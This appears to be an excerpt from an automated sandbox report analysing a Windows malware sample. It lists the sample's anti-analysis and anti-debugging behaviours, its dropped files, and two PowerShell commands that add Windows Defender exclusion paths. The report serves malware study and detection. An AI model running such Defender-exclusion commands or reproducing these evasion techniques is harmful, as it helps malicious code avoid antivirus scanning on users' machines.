Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Stalling execution: Execution stalls by calling Sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Memory allocated: 2EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0339B8B0 rdtsc

56_2_0339B8B0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5421	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Window / User API: threadDelayed 4955	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Window / User API: threadDelayed 4852	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7773	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1803	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7675
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1907
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7051
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2577
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7705
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3819
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2845
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7871
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1569

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

API coverage: 7.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep count: 5421 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 4349 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe TID: 8072	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe TID: 8140	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8064	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 964	Thread sleep count: 7773 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep count: 1803 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 7675 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 1907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668	Thread sleep count: 7496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668	Thread sleep count: 2007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 768	Thread sleep count: 7051 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908	Thread sleep count: 2577 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872	Thread sleep count: 7275 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1824	Thread sleep count: 2438 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep count: 7317 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5216	Thread sleep count: 2311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 7705 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 1758 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2768	Thread sleep count: 5860 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep count: 3819 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712	Thread sleep count: 6868 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180	Thread sleep count: 2845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384	Thread sleep count: 7870 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep count: 1772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep count: 7871 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5932	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep count: 1569 > 30
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 7112	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6684	Thread sleep count: 145 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6012	Thread sleep count: 52 > 30

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040AC68 FindFirstFileW,FindClose,	56_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	56_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033775E8 FindFirstFileA,	56_2_033775E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033776C4 FindFirstFileA,GetLastError,	56_2_033776C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_033760F2 GetSystemInfo,

56_2_033760F2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Source: spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
Source: spmm.exe, 0000004D.00000002.2674132311.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volum
Source: svchost.exe, 00000008.00000002.2690358497.0000027405654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2679298985.000002740002B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: spmm.exe, 0000004D.00000002.2674132311.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NETSTAT.EXE, 00000043.00000002.2458572520.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: [space]= .exe, 00000007.00000002.1804315913.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867265165.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2582806090.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001698000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, spmm.exe, 0000004D.00000002.2674132311.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: spkl.exe, 00000038.00000002.2691175840.0000000001484000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@IdPORT_vmnet
Source: curl.exe, 00000006.00000003.1548833142.000001CE89185000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0339B8B0 rdtsc

56_2_0339B8B0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_0036119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,

71_2_0036119B

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
